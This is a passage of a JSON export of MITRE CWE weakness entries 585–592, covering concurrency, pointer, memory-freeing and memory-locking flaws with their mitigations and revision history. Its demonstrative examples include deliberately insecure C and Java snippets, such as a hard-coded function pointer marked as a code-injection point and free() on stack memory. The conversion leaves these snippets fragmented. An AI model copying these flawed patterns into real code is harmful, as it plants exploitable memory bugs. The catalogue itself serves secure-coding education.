behavior, because you haven\'t protected the subsequent code by placing it inside the synchronized block, nothing is stopping somebody else from modifying whatever it was you were waiting for while you run the subsequent code."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When you come across an empty synchronized statement, or a synchronized statement in which the code has been commented out, try to determine what the original intentions were and whether or not the synchronized block is still necessary."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to synchronize on an object, but does not execute anything in the synchronized block. This does not actually accomplish anything and may be a sign that a programmer is wrestling with synchronization but has not yet achieved the result they intend.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"synchronized(this) { }"},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public void setID(int ID){}","xhtml:div":{"#text":"synchronized(this){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"this.ID = ID;","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"Instead, in a correct usage, the synchronized statement should contain procedures that access or modify data that is exposed to multiple threads. For example, consider a scenario in which several threads are accessing student records at the same time. The method which sets the student ID to a new value will need to make sure that nobody else is accessing this data at the same time and will require synchronization."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-478"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"586":{"attr":{"@_ID":"586","@_Name":"Explicit Call to Finalize()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes an explicit call to the finalize() method from outside the finalizer.","Extended_Description":"While the Java Language Specification allows an object\'s finalize() method to be called from outside the finalizer, doing so is usually a bad idea. For example, calling finalize() explicitly means that finalize() will be called more than once: the first time will be the explicit call and the last time will be the call that is made after the object is garbage collected.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Testing"],"Description":"Do not make explicit calls to finalize(). Use static analysis tools to spot such instances."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code fragment calls finalize() explicitly:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"widget.finalize();","xhtml:br":["",""],"xhtml:i":"// time to clean up"}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Name, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Explicit Call to Finalize","attr":{"@_Date":"2008-09-09"}}}},"587":{"attr":{"@_ID":"587","@_Name":"Assignment of a Fixed Address to a Pointer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software sets a pointer to a specific address other than NULL or 0.","Extended_Description":"Using a fixed address is not portable, because that address will probably not be valid in all environments or platforms.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If one executes code at a known location, an attacker might be able to inject code there beforehand."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","Reduce Maintainability","Reduce Reliability"],"Note":"If the code is ported to another platform or environment, the pointer is likely to be invalid and cause a crash."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"],"Note":"The data at a known pointer location can be easily read or influenced by an attacker."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Never set a pointer to a fixed address."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code assumes a particular function will always be found at a particular address. It assigns a pointer to that address and calls the function.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int (*pt2Function) (float, char, char)=0x08040000;int result2 = (*pt2Function) (12, \'a\', \'b\');","xhtml:br":["","",""],"xhtml:i":"// Here we can inject code to execute."}},"Body_Text":"The same function may not always be found at the same memory address. This could lead to a crash, or an attacker may alter the memory at the expected address, leading to arbitrary code execution."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Common_Consequences, Weakness_Ordinalities"}]}},"588":{"attr":{"@_ID":"588","@_Name":"Attempt to Access Child of a Non-structure Pointer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Casting a non-structure type to a structure type and accessing a field can lead to memory access errors or data corruption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Memory","Note":"Adjacent variables in memory may be corrupted by assignments performed on fields after the cast."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Execution may end due to a memory access error."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"Review of type casting operations can identify locations where incompatible types are cast."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct foo{}...int main(int argc, char **argv){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"int i;","attr":{"@_style":"margin-left:10px;"}},{"#text":"*foo = (struct foo *)main;foo->i = 2;return foo->i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer Use"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"}]}},"589":{"attr":{"@_ID":"589","@_Name":"Call to Non-ubiquitous API","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an API function that does not exist on all versions of the target platform. This could cause portability problems or inconsistencies that allow denial of service or other consequences.","Extended_Description":"Some functions that offer security features supported by the OS are not available on all versions of the OS in common use. Likewise, functions are often deprecated or made obsolete for security reasons and should not be used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"474","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Always test your code on any platform on which it is targeted to run on."},{"Phase":"Testing","Description":"Test your code on the newest and oldest platform on which it is targeted to run on."},{"Phase":"Testing","Description":"Develop a system to test for API functions that are not portable."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET02-J","Entry_Name":"Do not use deprecated or obsolete classes or methods"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER00-J","Entry_Name":"Maintain serialization compatibility during class evolution"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"96"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Call to Limited API","attr":{"@_Date":"2008-04-11"}}}},"590":{"attr":{"@_ID":"590","@_Name":"Free of Memory not on the Heap","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application calls free() on a pointer to memory that was not allocated using associated heap allocation functions such as malloc(), calloc(), or realloc().","Extended_Description":"When free() is called on an invalid pointer, the program\'s memory management data structures may become corrupted. This corruption can cause the program to crash or, in some circumstances, an attacker may be able to cause free() to operate on controllable memory locations to modify critical program variables or execute code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"762","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program via a \\"write, what where\\" primitive. If pointers to memory which hold user information are freed, a malicious user will be able to write 4 bytes anywhere in memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only free pointers that you have called malloc on previously. This is the recommended solution. Keep track of which pointers point at the beginning of valid chunks and free them only once."},{"Phase":"Implementation","Description":"Before freeing a pointer, the programmer should make sure that the pointer was previously allocated on the heap and that the memory belongs to the programmer. Freeing an unallocated pointer will cause undefined behavior in the program."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, an array of record_t structs, bar, is allocated automatically on the stack as a local variable and the programmer attempts to call free() on the array. The consequences will vary based on the implementation of free(), but it will not succeed in deallocating the memory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"record_t bar[MAX_SIZE];...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"record_t bar[MAX_SIZE]; //Global varvoid foo(){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...free(bar);","xhtml:br":["","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"record_t *bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t));...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"record_t *bar; //Global varvoid foo(){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t));...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}}],"Body_Text":["This example shows the array allocated globally, as part of the data segment of memory and the programmer attempts to call free() on the array.","Instead, if the programmer wanted to dynamically manage the memory, malloc() or calloc() should have been used.","Additionally, you can pass global variables to free() when they are pointers to dynamically allocated memory."]}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM34-C","Entry_Name":"Only free memory allocated dynamically","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"WIN30-C","Entry_Name":"Properly pair allocation and deallocation functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-480"}}},"Notes":{"Note":{"#text":"In C++, if the new operator was used to allocate the memory, it may be allocated with the malloc(), calloc() or realloc() family of functions in the implementation. Someone aware of this behavior might choose to map this problem to CWE-590 or to its parent, CWE-762, depending on their perspective.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Other_Notes"}],"Previous_Entry_Name":[{"#text":"Improperly Freeing Heap Memory","attr":{"@_Date":"2008-04-11"}},{"#text":"Free of Invalid Pointer Not on the Heap","attr":{"@_Date":"2009-05-27"}},{"#text":"Free of Memory not on the Heap","attr":{"@_Date":"2009-10-29"}}]}},"591":{"attr":{"@_ID":"591","@_Name":"Sensitive Data Storage in Improperly Locked Memory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data in memory that is not locked, or that has been incorrectly locked, which might cause the memory to be written to swap files on disk by the virtual memory manager. This can make the data more accessible to external actors.","Extended_Description":"On Windows systems the VirtualLock function can lock a page of memory to ensure that it will remain present in memory and not be swapped to disk. However, on older versions of Windows, such as 95, 98, or Me, the VirtualLock() function is only a stub and provides no protection. On POSIX systems the mlock() call ensures that a page will stay resident in memory but does not guarantee that the page will not appear in the swap. Therefore, it is unsuitable for use as a protection mechanism for sensitive data. Some platforms, in particular Linux, do make the guarantee that the page will not be swapped, but this is non-standard and is not portable. Calls to mlock() also require supervisor privilege. Return values for both of these calls must be checked to ensure that the lock operation was actually successful.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"413","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"Sensitive data that is written to a swap file may be exposed."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Identify data that needs to be protected from swapping and choose platform-appropriate protection mechanisms."},{"Phase":"Implementation","Description":"Check return values to ensure locking operations are successful."}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM06-C","Entry_Name":"Ensure that sensitive data is not written out to disk"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Memory Locking","attr":{"@_Date":"2008-04-11"}}}},"592":{"attr":{"@_ID":"592","@_Name":"DEPRECATED: Authentication Bypass Issues","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it covered redundant concepts already described in CWE-287.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated 